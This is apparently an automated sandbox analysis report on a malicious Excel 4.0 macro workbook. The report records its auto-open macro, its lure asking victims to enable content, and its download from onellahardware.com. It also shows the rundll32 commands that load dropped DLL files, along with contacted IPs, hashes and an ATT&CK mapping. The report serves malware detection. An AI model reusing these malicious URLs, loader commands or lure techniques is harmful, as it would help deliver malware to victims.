Loading ...

Play interactive tourEdit tour

Analysis Report catalog-1715742540.xlsm

Overview

General Information

Sample Name:catalog-1715742540.xlsm
Analysis ID:394251
MD5:4db94c8af1408627aa75f2a27e24bc78
SHA1:f7d30b96ed74932162fe8e6be4c486a98b2aa8dd
SHA256:27f45562827b17d609222b0e0619fb3cd726fb1944722a009e869ae15dad7d00
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1616 cmdline: rundll32 ..\ghnrope.ito1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2304 cmdline: rundll32 ..\ghnrope.ito2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 912 cmdline: rundll32 ..\ghnrope.ito3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://onellahardware.com/drms/alpa.htmlAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted fileShow sources
    Source: catalog-1715742540.xlsmVirustotal: Detection: 9%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 75.119.136.137:443 -> 192.168.2.22:49168 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: onellahardware.com
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.50.218.68:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.244.65.162:80

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 198.50.218.68 198.50.218.68
    Source: Joe Sandbox ViewIP Address: 75.119.136.137 75.119.136.137
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /drms/alpa.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: onellahardware.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ABC4B4.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /drms/alpa.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: onellahardware.comConnection: Keep-Alive
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: onellahardware.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 75.119.136.137:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 10 11 from the yellow bar above 12 13 Once You have Enable Editing, please cl -
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 10 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic
    Source: Screenshot number: 8Screenshot OCR: Enable Content X D3 - (" jR " A B C D E F G H I J K L M N O P Q R S : 1 ' THIS DOCUMENT IS EN
    Source: Screenshot number: 12Screenshot OCR: Enable Content X D3 " " jR " A B C D E F G H I J K L M N O P Q R S : 139 140 141 142 143 1
    Source: Screenshot number: 16Screenshot OCR: Enable Content X 0313 " " jR " A B C D E F G H I J K L M N O P Q R S : 301 302 303 304 305
    Source: Screenshot number: 20Screenshot OCR: Enable Content New Window X Open a new window containing a 1323 " " JG' view of the current do
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: catalog-1715742540.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: catalog-1715742540.xlsmInitial sample: Sheet size: 22623
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="5" rupBuild="9303"/><workbookPr defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="7815" windowHeight="1920"/></bookViews><sheets><sheet name="Sheet" sheetId="9" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet1!$AO$25</definedName></definedNames><calcPr calcId="145621"/></workbook>
    Source: rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@7/20@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$catalog-1715742540.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito1,DllRegisterServer
    Source: catalog-1715742540.xlsmVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito3,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito1,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito2,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ghnrope.ito3,DllRegisterServerJump to behavior
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: catalog-1715742540.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: catalog-1715742540.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: catalog-1715742540.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: catalog-1715742540.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    catalog-1715742540.xlsm10%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    upesagh.com0%VirustotalBrowse
    habitosdosucesso.net0%VirustotalBrowse
    onellahardware.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://onellahardware.com/drms/alpa.html0%VirustotalBrowse
    http://onellahardware.com/drms/alpa.html100%Avira URL Cloudmalware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    upesagh.com
    75.119.136.137
    truefalseunknown
    habitosdosucesso.net
    198.50.218.68
    truefalseunknown
    onellahardware.com
    216.244.65.162
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://onellahardware.com/drms/alpa.htmltrue
    • 0%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2111721433.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109906859.0000000001EB7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2103572805.0000000001E87000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2111490319.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109706690.0000000001CD0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2102918643.0000000001CA0000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                198.50.218.68
                habitosdosucesso.netCanada
                16276OVHFRfalse
                216.244.65.162
                onellahardware.comUnited States
                23033WOWUSfalse
                75.119.136.137
                upesagh.comUnited States
                13645BROADBANDONEUSfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:394251
                Start date:21.04.2021
                Start time:11:14:19
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:catalog-1715742540.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.troj.expl.evad.winXLSM@7/20@3/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 8.252.5.126, 8.241.89.126, 8.241.79.254, 8.241.82.254, 8.241.88.254, 93.184.221.240, 192.35.177.64
                • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net, apps.identrust.com
                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                198.50.218.68catalog-1840888847.xlsmGet hashmaliciousBrowse
                  catalog-1840888847.xlsmGet hashmaliciousBrowse
                    catalog-1576384985.xlsmGet hashmaliciousBrowse
                      catalog-1576384985.xlsmGet hashmaliciousBrowse
                        catalog-193510902.xlsmGet hashmaliciousBrowse
                          catalog-193510902.xlsmGet hashmaliciousBrowse
                            catalog-187543341.xlsmGet hashmaliciousBrowse
                              catalog-187543341.xlsmGet hashmaliciousBrowse
                                documents-122179384.xlsmGet hashmaliciousBrowse
                                  documents-1982636004.xlsmGet hashmaliciousBrowse
                                    documents-1982636004.xlsmGet hashmaliciousBrowse
                                      documents-466266883.xlsmGet hashmaliciousBrowse
                                        documents-466266883.xlsmGet hashmaliciousBrowse
                                          document-1245492889.xlsGet hashmaliciousBrowse
                                            document-1048628209.xlsGet hashmaliciousBrowse
                                              document-1771131239.xlsGet hashmaliciousBrowse
                                                document-1370071295.xlsGet hashmaliciousBrowse
                                                  document-69564892.xlsGet hashmaliciousBrowse
                                                    document-1320073816.xlsGet hashmaliciousBrowse
                                                      document-184653858.xlsGet hashmaliciousBrowse
                                                        75.119.136.137catalog-1180297109.xlsmGet hashmaliciousBrowse
                                                          catalog-1180297109.xlsmGet hashmaliciousBrowse
                                                            11.xlsmGet hashmaliciousBrowse
                                                              11.xlsmGet hashmaliciousBrowse
                                                                catalog-22001865.xlsmGet hashmaliciousBrowse
                                                                  catalog-22001865.xlsmGet hashmaliciousBrowse
                                                                    catalog-1571722150.xlsmGet hashmaliciousBrowse
                                                                      catalog-1571722150.xlsmGet hashmaliciousBrowse
                                                                        catalog-634355975.xlsmGet hashmaliciousBrowse
                                                                          catalog-641455000.xlsmGet hashmaliciousBrowse
                                                                            catalog-634355975.xlsmGet hashmaliciousBrowse
                                                                              catalog-641455000.xlsmGet hashmaliciousBrowse
                                                                                catalog-1482570486.xlsmGet hashmaliciousBrowse
                                                                                  catalog-1482570486.xlsmGet hashmaliciousBrowse
                                                                                    catalog-1134436431.xlsmGet hashmaliciousBrowse
                                                                                      catalog-1134436431.xlsmGet hashmaliciousBrowse
                                                                                        catalog-138717734.xlsmGet hashmaliciousBrowse

                                                                                          Domains

                                                                                          No context

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          WOWUSProjectOrder22.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          MT103 Slip.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          OjAJYVQ7iK.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          1FC9626D978197A611B62BF796D472A6F8AB372E70DDF.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          A4816D4FECD6D2806D5B105C3AAB55F4A1EB5DEB3B126.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          qnJXJsqt1M.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          1RkccAiQMy.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          NaHU7wO2Wf.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
